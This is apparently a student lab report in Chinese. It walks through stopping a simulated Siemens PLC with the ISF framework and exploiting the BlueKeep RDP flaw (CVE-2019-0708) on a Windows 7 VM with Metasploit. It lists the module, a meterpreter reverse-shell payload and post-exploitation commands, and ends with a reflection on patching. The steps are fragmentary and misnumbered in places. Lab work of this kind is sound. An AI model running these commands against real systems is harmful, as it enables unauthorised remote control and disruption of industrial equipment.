环境准备
说明:该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。
这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。
1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境
git clone https://github.com/dark-lbp/isf/
B.进入文件夹使用命令python2 setup.py install
C.进入python2中import nmap发现没有报错了,使用exit()退出
3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径
(1).用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中
(2)在serverdemo.exe界面先点击start启动server
(3)可以查看到serverdemo.exe下面日志就显示serverstarted
(5)clientdemo.exe界面上点击connect连接
(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)
use exploits/plcs/siemens/s7_300_400_plc_control
5.show options;set target 物理机IP
这里显示 stop plc ,同时查看模拟器中的输出,可以发现已经停止
1.开启Kali虚拟机和win7靶机
2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
3.若3389没打开,可以右键计算机,选择属性
4.选择远程设置
5.选择允许远程连接
7.5.2 利用windows 7 cve-2019-0708漏洞案例
1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:
nmap 192.168.11.133(win7IP)
2.确认开启后启动msfconsole
3. 搜索漏洞:
search 0708
前两个模块,一个是扫描功能,一个是攻击功能。
4.使用攻击功能,也就是第二个模块:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
5.设置目标:
set rhost 被攻击ip #设置win7ip
set rport 3389
6.设置payload:
set payload windows/x64/meterpreter/reverse_tcp #设置64位的payload如果是32位机器则不用加x64
7.设置攻击机:
set lhost 攻击者ip #设置kali的ip
set lport 4444 #设置攻击者的监听端口(端口可以随意更改)
8.输入:show targets,显示可以选择的靶机的架构
9.用于vm是15.5.1,所以可以选择target 3-5
10.选择target 3,进行尝试:
set target 3
11.进行攻击,运行:run
12.假如可以建立连接,输入:
run post/windows/manage/enable_rdp
运行远程桌面模块
13.另开一个kali终端,输入:
rdesktop win7靶机IP
总结
我了解到,CVE-2019-0708是Windows 7和Windows Server 2008中存在的一个远程代码执行漏洞,也被称为“蓝色屏幕死机(BlueKeep)”漏洞。
学习和了解这个漏洞带给我的收获是:
1. 漏洞原理:了解了漏洞是如何利用RDP协议中的一个缓冲区溢出漏洞来实现代码执行的。深入了解漏洞的原理有助于我更好地理解系统安全的重要性和攻击者的思维方式。
2. 危害性:CVE-2019-0708是一个非常危险的漏洞,攻击者可以通过发送恶意的RDP请求来远程执行代码,进而控制受影响的系统。这使得我认识到了系统安全的重要性,并意识到了及时更新和修复系统漏洞的重要性。
3. 补丁和更新:Microsoft已经发布了相应的安全补丁来修复这个漏洞。这让我明白了及时安装系统更新和补丁的重要性,以保持系统的安全性。
4. 安全意识:通过了解这个漏洞,我更加重视了信息安全和网络安全的重要性。我认识到了保护个人和组织的信息、系统和网络的重要性,并更加关注保持系统安全和采取必要的安全措施。总的来说,通过学习CVE-2019-0708漏洞,我加深了对系统漏洞和安全问题的认识,提高了信息安全意识,并增强了保护个人和组织安全的意识和能力。